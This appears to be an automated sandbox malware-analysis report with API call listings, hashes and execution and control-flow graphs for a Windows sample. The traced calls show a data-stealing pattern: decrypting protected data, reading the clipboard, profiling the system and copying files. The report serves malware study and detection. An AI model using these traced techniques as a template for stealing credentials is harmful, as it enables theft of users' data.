                                                                                                                                      • Source File: 00000003.00000002.2178967849.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true
                                                                                                                                      • Associated: 00000003.00000002.2178950318.00000000006E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000003.00000002.2178987110.00000000006F5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000003.00000002.2179015543.00000000006FC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000003.00000002.2179034596.00000000006FE000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000003.00000002.2179051866.00000000006FF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000003.00000002.2179074675.0000000000702000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_3_2_6e0000_NHEXQatKdE.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: 3b4dca759751ab1c6b6e3f86af5973434c9b9b4ccd09ad5054b8a655180c34cb
                                                                                                                                      • Instruction ID: 30966dc9e4cc1c0ba569fc0d47df8082977beccdbc2673929cfbd7128ee5ef88
                                                                                                                                      • Opcode Fuzzy Hash: 3b4dca759751ab1c6b6e3f86af5973434c9b9b4ccd09ad5054b8a655180c34cb
                                                                                                                                      • Instruction Fuzzy Hash: 102193B1202385AFDB20AF67CC819AB77AFEF04364B149529F919D7251EB30EC118794
                                                                                                                                      APIs
                                                                                                                                      • GetEnvironmentStringsW.KERNEL32 ref: 006EBD90
                                                                                                                                        • Part of subcall function 006EBC8C: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,006EC9E3,?,00000000,-00000008), ref: 006EBCED
                                                                                                                                      • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 006EBDC8
                                                                                                                                      • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 006EBDE8
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000003.00000002.2178967849.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true
                                                                                                                                      • Associated: 00000003.00000002.2178950318.00000000006E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000003.00000002.2178987110.00000000006F5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000003.00000002.2179015543.00000000006FC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000003.00000002.2179034596.00000000006FE000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000003.00000002.2179051866.00000000006FF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000003.00000002.2179074675.0000000000702000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_3_2_6e0000_NHEXQatKdE.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: EnvironmentStrings$Free$ByteCharMultiWide
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 158306478-0
                                                                                                                                      • Opcode ID: a2902f4a73697e4860adc2e761aee85337e619be00ec5d209d9767289ed2feb1
                                                                                                                                      • Instruction ID: e55b53eab1c5ad6dcc780777f42b85f194c8097130bcaa297ddcf77ecf625949
                                                                                                                                      • Opcode Fuzzy Hash: a2902f4a73697e4860adc2e761aee85337e619be00ec5d209d9767289ed2feb1
                                                                                                                                      • Instruction Fuzzy Hash: 2311E1F25073957FA71127F39C89CFF295EDE447D87242428FA0992101EF208D0182B6
                                                                                                                                      APIs
                                                                                                                                      • WriteConsoleW.KERNEL32(00000000,?,?,00000000,00000000,?,006F1734,00000000,00000001,?,?,?,006ED2F1,?,00000000,00000000), ref: 006F2967
                                                                                                                                      • GetLastError.KERNEL32(?,006F1734,00000000,00000001,?,?,?,006ED2F1,?,00000000,00000000,?,?,?,006ECC37,?), ref: 006F2973
                                                                                                                                        • Part of subcall function 006F29C4: CloseHandle.KERNEL32(FFFFFFFE,006F2983,?,006F1734,00000000,00000001,?,?,?,006ED2F1,?,00000000,00000000,?,?), ref: 006F29D4
                                                                                                                                      • ___initconout.LIBCMT ref: 006F2983
                                                                                                                                        • Part of subcall function 006F29A5: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,006F2941,006F1721,?,?,006ED2F1,?,00000000,00000000,?), ref: 006F29B8
                                                                                                                                      • WriteConsoleW.KERNEL32(00000000,?,?,00000000,?,006F1734,00000000,00000001,?,?,?,006ED2F1,?,00000000,00000000,?), ref: 006F2998
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000003.00000002.2178967849.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true
                                                                                                                                      • Associated: 00000003.00000002.2178950318.00000000006E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000003.00000002.2178987110.00000000006F5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000003.00000002.2179015543.00000000006FC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000003.00000002.2179034596.00000000006FE000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000003.00000002.2179051866.00000000006FF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000003.00000002.2179074675.0000000000702000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_3_2_6e0000_NHEXQatKdE.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 2744216297-0
                                                                                                                                      • Opcode ID: deef50bd1af7442bf39d045aebaf58814df045485b4142ef89ecd301e8824872
                                                                                                                                      • Instruction ID: 7d10ce78634c6f2683d0f72c37064e3da893c0dc933f546fbc5021e3abe67dcc
                                                                                                                                      • Opcode Fuzzy Hash: deef50bd1af7442bf39d045aebaf58814df045485b4142ef89ecd301e8824872
                                                                                                                                      • Instruction Fuzzy Hash: F4F01C3690011ABBCF222FD2DD18AE93F67FF093A5F155110FA0C86120C672C820EF92
                                                                                                                                      APIs
                                                                                                                                      • GetSystemTimeAsFileTime.KERNEL32(?), ref: 006E2125
                                                                                                                                      • GetCurrentThreadId.KERNEL32 ref: 006E2134
                                                                                                                                      • GetCurrentProcessId.KERNEL32 ref: 006E213D
                                                                                                                                      • QueryPerformanceCounter.KERNEL32(?), ref: 006E214A
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000003.00000002.2178967849.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true
                                                                                                                                      • Associated: 00000003.00000002.2178950318.00000000006E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000003.00000002.2178987110.00000000006F5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000003.00000002.2179015543.00000000006FC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000003.00000002.2179034596.00000000006FE000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000003.00000002.2179051866.00000000006FF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000003.00000002.2179074675.0000000000702000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_3_2_6e0000_NHEXQatKdE.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 2933794660-0
                                                                                                                                      • Opcode ID: 68d4693024a65422dcc705b3454e9d525d437dd8ed1908ea9de33c9dbf37690c
                                                                                                                                      • Instruction ID: 984ea888b0428a3e9bcc80e2679b4d7d5a150ffb43ea584657bf61ac231781df
                                                                                                                                      • Opcode Fuzzy Hash: 68d4693024a65422dcc705b3454e9d525d437dd8ed1908ea9de33c9dbf37690c
                                                                                                                                      • Instruction Fuzzy Hash: ACF062B4D1020DEBCB00DBF4DA499AEBBF6EF1C201BA15596A412E7110EB34AB44DB51
                                                                                                                                      APIs
                                                                                                                                      • EncodePointer.KERNEL32(00000000,00000000,00000000,?,?,?,?,?,?,006F069B,?,?,00000000,00000000,00000000,?), ref: 006F07BF
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000003.00000002.2178967849.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true
                                                                                                                                      • Associated: 00000003.00000002.2178950318.00000000006E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000003.00000002.2178987110.00000000006F5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000003.00000002.2179015543.00000000006FC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000003.00000002.2179034596.00000000006FE000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000003.00000002.2179051866.00000000006FF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000003.00000002.2179074675.0000000000702000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_3_2_6e0000_NHEXQatKdE.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: EncodePointer
                                                                                                                                      • String ID: MOC$RCC
                                                                                                                                      • API String ID: 2118026453-2084237596
                                                                                                                                      • Opcode ID: 00dc6aeffbf7d341f489ee91e14065d46af1ab85d14c7ee7199d28017b84c4bb
                                                                                                                                      • Instruction ID: bfc52e4aeab4ca6d57117619860e593cb7154bdc249275f7dc10e148640bda76
                                                                                                                                      • Opcode Fuzzy Hash: 00dc6aeffbf7d341f489ee91e14065d46af1ab85d14c7ee7199d28017b84c4bb
                                                                                                                                      • Instruction Fuzzy Hash: EF416C7190020DEFEF15DF94CD81AEE7BB6BF08344F148159FA1467252D335A950DB91
                                                                                                                                      APIs
                                                                                                                                      • ___except_validate_context_record.LIBVCRUNTIME ref: 006F027D
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000003.00000002.2178967849.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true
                                                                                                                                      • Associated: 00000003.00000002.2178950318.00000000006E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000003.00000002.2178987110.00000000006F5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000003.00000002.2179015543.00000000006FC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000003.00000002.2179034596.00000000006FE000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000003.00000002.2179051866.00000000006FF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000003.00000002.2179074675.0000000000702000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_3_2_6e0000_NHEXQatKdE.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: ___except_validate_context_record
                                                                                                                                      • String ID: csm$csm
                                                                                                                                      • API String ID: 3493665558-3733052814
                                                                                                                                      • Opcode ID: 44d16d91017c7bebf5afb11ae0c996caec68100e57e60f95735ccbb32fa92ee3
                                                                                                                                      • Instruction ID: 83fd420f397b215d36861ed78a651814e2bcfe21d4910e6dbf6ad437a1c1efc0
                                                                                                                                      • Opcode Fuzzy Hash: 44d16d91017c7bebf5afb11ae0c996caec68100e57e60f95735ccbb32fa92ee3
                                                                                                                                      • Instruction Fuzzy Hash: 6431CF3740021EEBEF228F54CC448BE7B67FB0A715B18855AFA5449223C332CDA1DB91

                                                                                                                                      Execution Graph

                                                                                                                                      Execution Coverage:8.2%
                                                                                                                                      Dynamic/Decrypted Code Coverage:0%
                                                                                                                                      Signature Coverage:35.2%
                                                                                                                                      Total number of Nodes:372
                                                                                                                                      Total number of Limit Nodes:19
                                                                                                                                      execution_graph 13330 42fb82 13333 4141a0 13330->13333 13332 42fb87 CoSetProxyBlanket 13333->13332 13334 420940 13346 43d410 13334->13346 13336 420980 13343 42107b 13336->13343 13350 439600 13336->13350 13338 4209be 13345 420a33 13338->13345 13353 43b1c0 LdrInitializeThunk 13338->13353 13340 439600 RtlAllocateHeap 13340->13345 13341 420ff2 13341->13343 13355 43b1c0 LdrInitializeThunk 13341->13355 13345->13340 13345->13341 13354 43b1c0 LdrInitializeThunk 13345->13354 13347 43d430 13346->13347 13348 43d52e 13347->13348 13356 43b1c0 LdrInitializeThunk 13347->13356 13348->13336 13357 43c830 13350->13357 13352 43960a RtlAllocateHeap 13352->13338 13353->13338 13354->13345 13355->13341 13356->13348 13358 43c850 13357->13358 13358->13352 13358->13358 13359 43e280 13360 43e28f 13359->13360 13361 43e38e 13360->13361 13367 43b1c0 LdrInitializeThunk 13360->13367 13363 439600 RtlAllocateHeap 13361->13363 13365 43e49e 13361->13365 13364 43e405 13363->13364 13364->13365 13368 43b1c0 LdrInitializeThunk 13364->13368 13367->13361 13368->13365 13369 42f081 13370 42f090 13369->13370 13371 42f0d0 SysFreeString SysFreeString 13370->13371 13372 42f128 13370->13372 13371->13370 13373 432187 13374 43218c 13373->13374 13375 4321bf GetSystemMetrics GetSystemMetrics 13374->13375 13376 4321fe 13375->13376 13377 43aec5 13378 43af00 13377->13378 13378->13378 13379 43af70 LoadLibraryExW 13378->13379 13380 43af7e 13379->13380 13381 40c8ca CoInitializeSecurity CoInitializeSecurity 13382 42c9cd 13384 42ca00 13382->13384 13383 42caee 13384->13383 13386 43b1c0 LdrInitializeThunk 13384->13386 13386->13383 13387 415211 13388 415216 13387->13388 13397 43d700 13388->13397 13390 41522f 13392 415270 13390->13392 13395 41534e 13390->13395 13396 415507 13390->13396 13401 43d7b0 13390->13401 13392->13395 13392->13396 13407 43b1c0 LdrInitializeThunk 13392->13407 13394 4154dd CryptUnprotectData 13394->13396 13395->13394 13395->13396 13396->13396 13399 43d720 13397->13399 13398 43d75e 13398->13390 13399->13398 13408 43b1c0 LdrInitializeThunk 13399->13408 13402 43d7d0 13401->13402 13403 43d80e 13402->13403 13409 43b1c0 LdrInitializeThunk 13402->13409 13403->13403 13404 43d88e 13403->13404 13410 43b1c0 LdrInitializeThunk 13403->13410 13404->13392 13407->13395 13408->13398 13409->13403 13410->13404 13411 43b611 13412 43b650 13411->13412 13413 43b782 13412->13413 13415 43b1c0 LdrInitializeThunk 13412->13415 13415->13413 13416 40d553 13417 40d560 13416->13417 13419 40d5ce 13417->13419 13459 43b1c0 LdrInitializeThunk 13417->13459 13421 40d66e 13419->13421 13460 43b1c0 LdrInitializeThunk 13419->13460 13430 423620 13421->13430 13423 40d6dd 13442 4259f0 13423->13442 13425 40d702 13450 425e20 13425->13450 13427 40d70b 13461 431020 OpenClipboard 13427->13461 13431 423630 13430->13431 13471 43da00 13431->13471 13433 4236e2 13435 4233a4 13433->13435 13436 4237a0 13433->13436 13483 43dd20 13433->13483 13435->13423 13475 43daf0 13436->13475 13438 4237cd 13439 43da00 LdrInitializeThunk 13438->13439 13441 423804 13438->13441 13439->13441 13491 43b1c0 LdrInitializeThunk 13441->13491 13443 425a10 13442->13443 13444 425a4e 13443->13444 13497 43b1c0 LdrInitializeThunk 13443->13497 13445 439600 RtlAllocateHeap 13444->13445 13449 425b1e 13444->13449 13447 425ace 13445->13447 13447->13449 13498 43b1c0 LdrInitializeThunk 13447->13498 13449->13425 13499 425e40 13450->13499 13452 425e34 13452->13427 13453 425e29 13453->13452 13512 437880 13453->13512 13455 426737 13456 43d410 LdrInitializeThunk 13455->13456 13457 42691f CopyFileW 13455->13457 13458 42674a 13455->13458 13456->13455 13457->13455 13458->13427 13459->13419 13460->13421 13462 431044 GetClipboardData 13461->13462 13463 40d755 13461->13463 13464 431062 13462->13464 13465 431067 GlobalLock 13462->13465 13466 431189 CloseClipboard 13464->13466 13468 43107d 13465->13468 13466->13463 13467 43117d GlobalUnlock 13467->13466 13468->13467 13469 4310ab GetWindowLongW 13468->13469 13470 431115 13469->13470 13470->13467 13473 43da20 13471->13473 13472 43dabf 13472->13433 13473->13472 13492 43b1c0 LdrInitializeThunk 13473->13492 13476 43db00 13475->13476 13477 43db3e 13476->13477 13493 43b1c0 LdrInitializeThunk 13476->13493 13479 439600 RtlAllocateHeap 13477->13479 13482 43dc1f 13477->13482 13480 43dbcc 13479->13480 13480->13482 13494 43b1c0 LdrInitializeThunk 13480->13494 13482->13438 13482->13482 13484 43dd40 13483->13484 13485 43dd7e 13484->13485 13495 43b1c0 LdrInitializeThunk 13484->13495 13487 439600 RtlAllocateHeap 13485->13487 13490 43de3e 13485->13490 13488 43dde4 13487->13488 13488->13490 13496 43b1c0 LdrInitializeThunk 13488->13496 13490->13433 13490->13490 13491->13435 13492->13472 13493->13477 13494->13482 13495->13485 13496->13490 13497->13444 13498->13449 13500 425e80 13499->13500 13500->13500 13519 439660 13500->13519 13502 425eec 13527 439970 13502->13527 13509 425fb2 13510 425f04 13509->13510 13511 4260e3 13509->13511 13541 439f30 13509->13541 13545 439b00 13510->13545 13511->13453 13517 4378b0 13512->13517 13513 43da00 LdrInitializeThunk 13513->13517 13514 43dd20 2 API calls 13514->13517 13515 4379f8 13515->13455 13517->13513 13517->13514 13517->13515 13561 43e280 13517->13561 13569 43b1c0 LdrInitializeThunk 13517->13569 13520 439690 13519->13520 13521 43971e 13520->13521 13549 43b1c0 LdrInitializeThunk 13520->13549 13523 439600 RtlAllocateHeap 13521->13523 13524 43985e 13521->13524 13525 4397a9 13523->13525 13524->13502 13525->13524 13550 43b1c0 LdrInitializeThunk 13525->13550 13528 425ef8 13527->13528 13529 439982 13527->13529 13528->13509 13528->13510 13531 43a030 13528->13531 13529->13528 13551 43b1c0 LdrInitializeThunk 13529->13551 13533 43a080 13531->13533 13532 43a7ce 13532->13509 13540 43a10e 13533->13540 13552 43b1c0 LdrInitializeThunk 13533->13552 13536 43a724 13536->13532 13557 43b1c0 LdrInitializeThunk 13536->13557 13538 439f30 LdrInitializeThunk 13538->13540 13539 43b1c0 LdrInitializeThunk 13539->13540 13540->13532 13540->13536 13540->13538 13540->13539 13553 439e40 13540->13553 13542 439f50 13541->13542 13544 439fee 13542->13544 13559 43b1c0 LdrInitializeThunk 13542->13559 13544->13509 13546 439b15 13545->13546 13547 426575 13545->13547 13546->13547 13560 43b1c0 LdrInitializeThunk 13546->13560 13547->13453 13549->13521 13550->13524 13551->13528 13552->13540 13555 439e60 13553->13555 13554 439eee 13554->13540 13555->13554 13558 43b1c0 LdrInitializeThunk 13555->13558 13557->13532 13558->13554 13559->13544 13560->13547 13562 43e28f 13561->13562 13563 43e38e 13562->13563 13570 43b1c0 LdrInitializeThunk 13562->13570 13565 439600 RtlAllocateHeap 13563->13565 13567 43e49e 13563->13567 13566 43e405 13565->13566 13566->13567 13571 43b1c0 LdrInitializeThunk 13566->13571 13567->13517 13569->13517 13570->13563 13571->13567 13572 40ce98 13573 40ceb0 13572->13573 13576 436980 13573->13576 13575 40cf9e 13575->13575 13577 4369b0 CoCreateInstance 13576->13577 13579 437019 13577->13579 13580 436bfe SysAllocString 13577->13580 13582 437029 GetVolumeInformationW 13579->13582 13583 436c9c 13580->13583 13589 43704b 13582->13589 13584 436ca4 CoSetProxyBlanket 13583->13584 13585 437009 SysFreeString 13583->13585 13586 436cc4 SysAllocString 13584->13586 13587 436fff 13584->13587 13585->13579 13590 436da0 13586->13590 13587->13585 13589->13575 13590->13590 13591 436ddb SysAllocString 13590->13591 13594 436e02 13591->13594 13592 436fec SysFreeString SysFreeString 13592->13587 13593 436fe2 13593->13592 13594->13592 13594->13593 13595 436e46 VariantInit 13594->13595 13597 436ea0 13595->13597 13596 436fd1 VariantClear 13596->13593 13597->13596 13598 422e99 13599 422c7a 13598->13599 13600 422c9b 13598->13600 13600->13598 13600->13600 13601 43d580 LdrInitializeThunk 13600->13601 13601->13600 13602 42f31c CoSetProxyBlanket 13603 42ba22 13604 42ba46 13603->13604 13605 42bb3b GetComputerNameExA 13604->13605 13606 42bb90 GetComputerNameExA 13605->13606 13608 42bc80 13606->13608 13609 4087a0 13611 4087ab 13609->13611 13610 4087fe ExitProcess 13611->13610 13612 4087b8 GetCurrentProcessId GetCurrentThreadId SHGetSpecialFolderPathW GetForegroundWindow 13611->13612 13613 4087e8 13611->13613 13612->13613 13613->13610 13614 43b162 13615 43b192 13614->13615 13616 43b170 13614->13616 13617 439600 RtlAllocateHeap 13615->13617 13618 43b198 13616->13618 13619 43b183 RtlReAllocateHeap 13616->13619 13617->13618 13619->13618 13620 4201a0 13621 4201ae 13620->13621 13625 420208 13620->13625 13626 4202d0 13621->13626 13623 42028c 13624 41e520 RtlAllocateHeap LdrInitializeThunk 13623->13624 13623->13625 13624->13625 13627 4202e0 13626->13627 13627->13627 13630 43d580 13627->13630 13629 4203bf 13631 43d5a0 13630->13631 13631->13631 13632 43d6ae 13631->13632 13634 43b1c0 LdrInitializeThunk 13631->13634 13632->13629 13634->13632 13635 439660 13636 439690 13635->13636 13637 43971e 13636->13637 13643 43b1c0 LdrInitializeThunk 13636->13643 13639 439600 RtlAllocateHeap 13637->13639 13640 43985e 13637->13640 13641 4397a9 13639->13641 13641->13640 13644 43b1c0 LdrInitializeThunk 13641->13644 13643->13637 13644->13640 13645 40d466 13646 40d480 13645->13646 13646->13646 13647 40d4e5 13646->13647 13649 43b1c0 LdrInitializeThunk 13646->13649 13649->13647 13650 40c726 CoInitializeEx CoInitializeEx 13651 40d76f 13652 40d775 13651->13652 13653 40d77f CoUninitialize 13652->13653 13654 40d7a0 13653->13654 13655 4183f0 13656 4183c0 13655->13656 13656->13655 13657 43d580 LdrInitializeThunk 13656->13657 13658 418557 13656->13658 13660 4185ad 13656->13660 13657->13656 13661 41bb40 13658->13661 13662 41bb8b 13661->13662 13673 4141b0 13662->13673 13664 41bc87 13665 4141b0 2 API calls 13664->13665 13666 41bcfb 13665->13666 13667 4141b0 2 API calls 13666->13667 13668 41bd81 13667->13668 13669 4141b0 2 API calls 13668->13669 13670 41be37 13669->13670 13671 4141b0 2 API calls 13670->13671 13672 41bea3 13671->13672 13672->13660 13674 4141d0 13673->13674 13674->13674 13675 43d410 LdrInitializeThunk 13674->13675 13676 4142ed 13675->13676 13677 43d410 LdrInitializeThunk 13676->13677 13678 4144df 13677->13678 13680 439600 RtlAllocateHeap 13678->13680 13700 4145b5 13678->13700 13701 41456e 13678->13701 13706 41450a 13680->13706 13681 414af5 13682 414b47 13681->13682 13684 414cc2 13681->13684 13685 414cd4 13681->13685 13693 414b6f 13681->13693 13699 414beb 13681->13699 13705 4147e2 13681->13705 13724 439bf0 13681->13724 13687 43d410 LdrInitializeThunk 13682->13687 13683 414622 13683->13681 13683->13682 13683->13684 13683->13685 13691 439660 2 API calls 13683->13691 13683->13693 13683->13699 13683->13705 13689 439b00 LdrInitializeThunk 13684->13689 13690 439b00 LdrInitializeThunk 13685->13690 13687->13705 13688 43d700 LdrInitializeThunk 13688->13693 13689->13685 13694 414cdd 13690->13694 13695 414ae9 13691->13695 13693->13688 13696 43d7b0 LdrInitializeThunk 13693->13696 13693->13699 13693->13705 13694->13694 13698 439970 LdrInitializeThunk 13695->13698 13696->13693 13697 4149de 13723 43b1c0 LdrInitializeThunk 13697->13723 13698->13681 13699->13705 13733 43b1c0 LdrInitializeThunk 13699->13733 13700->13683 13732 43b1c0 LdrInitializeThunk 13700->13732 13701->13681 13701->13682 13701->13683 13701->13684 13701->13685 13701->13693 13701->13697 13701->13699 13701->13700 13702 414980 13701->13702 13701->13705 13708 43b1c0 LdrInitializeThunk 13701->13708 13712 437420 13701->13712 13702->13697 13722 43b1c0 LdrInitializeThunk 13702->13722 13705->13664 13706->13701 13711 43b1c0 LdrInitializeThunk 13706->13711 13708->13701 13711->13701 13713 437440 13712->13713 13713->13713 13714 437520 13713->13714 13734 43b1c0 LdrInitializeThunk 13713->13734 13716 43784a 13714->13716 13717 439970 LdrInitializeThunk 13714->13717 13716->13701 13720 437567 13717->13720 13718 439b00 LdrInitializeThunk 13718->13716 13719 43b1c0 LdrInitializeThunk 13719->13720 13720->13719 13721 43784e 13720->13721 13721->13718 13722->13697 13723->13700 13725 414b13 13724->13725 13726 439c0a 13724->13726 13725->13682 13725->13684 13725->13685 13725->13693 13725->13699 13725->13705 13726->13725 13730 439cbe 13726->13730 13735 43b1c0 LdrInitializeThunk 13726->13735 13727 439b00 LdrInitializeThunk 13727->13725 13729 439dfe 13729->13725 13729->13727 13730->13729 13736 43b1c0 LdrInitializeThunk 13730->13736 13732->13683 13733->13684 13734->13713 13735->13730 13736->13729 13737 439632 13738 439651 13737->13738 13739 439640 13737->13739 13740 439645 RtlFreeHeap 13739->13740 13740->13738 13741 43ba71 13743 43b9c0 13741->13743 13742 43bae1 13743->13742 13746 43b1c0 LdrInitializeThunk 13743->13746 13745 43bb07 13746->13745 13747 4366b0 13750 4366be 13747->13750 13748 4367e7 13751 436765 13750->13751 13756 43b1c0 LdrInitializeThunk 13750->13756 13751->13748 13753 436838 13751->13753 13755 43b1c0 LdrInitializeThunk 13751->13755 13753->13748 13757 43b1c0 LdrInitializeThunk 13753->13757 13755->13751 13756->13750 13757->13753 13758 43b5b5 GetForegroundWindow 13762 43d240 13758->13762 13760 43b5c3 GetForegroundWindow 13761 43b5de 13760->13761 13763 43d250 13762->13763 13763->13760 13764 433e3b 13765 433e52 13764->13765 13766 433e6f GetUserDefaultUILanguage 13765->13766 13767 433ea6 13766->13767 13773 43437f 13774 4343af 13773->13774 13776 4343e1 13774->13776 13777 43b1c0 LdrInitializeThunk 13774->13777 13777->13774 13778 4104be 13781 4104db 13778->13781 13780 40e82a 13781->13780 13782 414cf0 13781->13782 13783 414d10 13782->13783 13783->13783 13784 43d410 LdrInitializeThunk 13783->13784 13785 414e5d 13784->13785 13786 41500f 13785->13786 13787 43d700 LdrInitializeThunk 13785->13787 13788 414e7f 13785->13788 13791 4150b2 13785->13791 13795 414ebc 13785->13795 13786->13795 13796 43b1c0 LdrInitializeThunk 13786->13796 13787->13788 13788->13786 13789 43d7b0 LdrInitializeThunk 13788->13789 13788->13791 13788->13795 13790 414ead 13789->13790 13790->13786 13790->13791 13790->13795 13794 43d410 LdrInitializeThunk 13791->13794 13793 415869 13794->13795 13795->13780 13796->13793

                                                                                                                                      Control-flow Graph

                                                                                                                                      • Executed
                                                                                                                                      • Not Executed
                                                                                                                                      control_flow_graph 0 436980-4369af 1 4369b0-4369c9 0->1 1->1 2 4369cb-4369d8 1->2 3 4369e0-4369f2 2->3 3->3 4 4369f4-436a34 3->4 5 436a40-436a69 4->5 5->5 6 436a6b-436a84 5->6 8 436a8a-436a95 6->8 9 436b3c-436b47 6->9 11 436aa0-436ae6 8->11 10 436b50-436b9f 9->10 10->10 13 436ba1-436bf8 CoCreateInstance 10->13 11->11 12 436ae8-436afb 11->12 14 436b00-436b30 12->14 15 437019-437049 call 43cc40 GetVolumeInformationW 13->15 16 436bfe-436c32 13->16 14->14 17 436b32-436b37 14->17 22 437053-437055 15->22 23 43704b-43704f 15->23 18 436c40-436c72 16->18 17->9 18->18 20 436c74-436c9e SysAllocString 18->20 28 436ca4-436cbe CoSetProxyBlanket 20->28 29 437009-437015 SysFreeString 20->29 24 43706d-437074 22->24 23->22 26 437080-437095 24->26 27 437076-43707d 24->27 30 4370a0-4370c6 26->30 27->26 31 436cc4-436cdf 28->31 32 436fff-437005 28->32 29->15 30->30 33 4370c8-4370e6 30->33 34 436ce0-436d18 31->34 32->29 35 4370f0-437122 33->35 34->34 36 436d1a-436d93 SysAllocString 34->36 35->35 37 437124-43714f call 41d250 35->37 38 436da0-436dd9 36->38 43 437150-437158 37->43 38->38 39 436ddb-436e04 SysAllocString 38->39 44 436e0a-436e2c 39->44 45 436fec-436ffb SysFreeString * 2 39->45 43->43 46 43715a-43715c 43->46 52 436fe2-436fe8 44->52 53 436e32-436e35 44->53 45->32 47 437162-437172 call 408180 46->47 48 437060-437067 46->48 47->48 48->24 49 437177-43717e 48->49 52->45 53->52 55 436e3b-436e40 53->55 55->52 56 436e46-436e91 VariantInit 55->56 57 436ea0-436eca 56->57 57->57 58 436ecc-436ede 57->58 59 436ee2-436ee4 58->59 60 436fd1-436fde VariantClear 59->60 61 436eea-436ef0 59->61 60->52 61->60 62 436ef6-436f08 61->62 63 436f0a-436f0f 62->63 64 436f4d 62->64 65 436f2c-436f30 63->65 66 436f4f-436f87 call 4080d0 call 408c20 64->66 67 436f32-436f3b 65->67 68 436f20 65->68 77 436fc0-436fcd call 4080e0 66->77 78 436f89-436f9f 66->78 71 436f42-436f46 67->71 72 436f3d-436f40 67->72 70 436f21-436f2a 68->70 70->65 70->66 71->70 74 436f48-436f4b 71->74 72->70 74->70 77->60 78->77 80 436fa1-436fb7 78->80 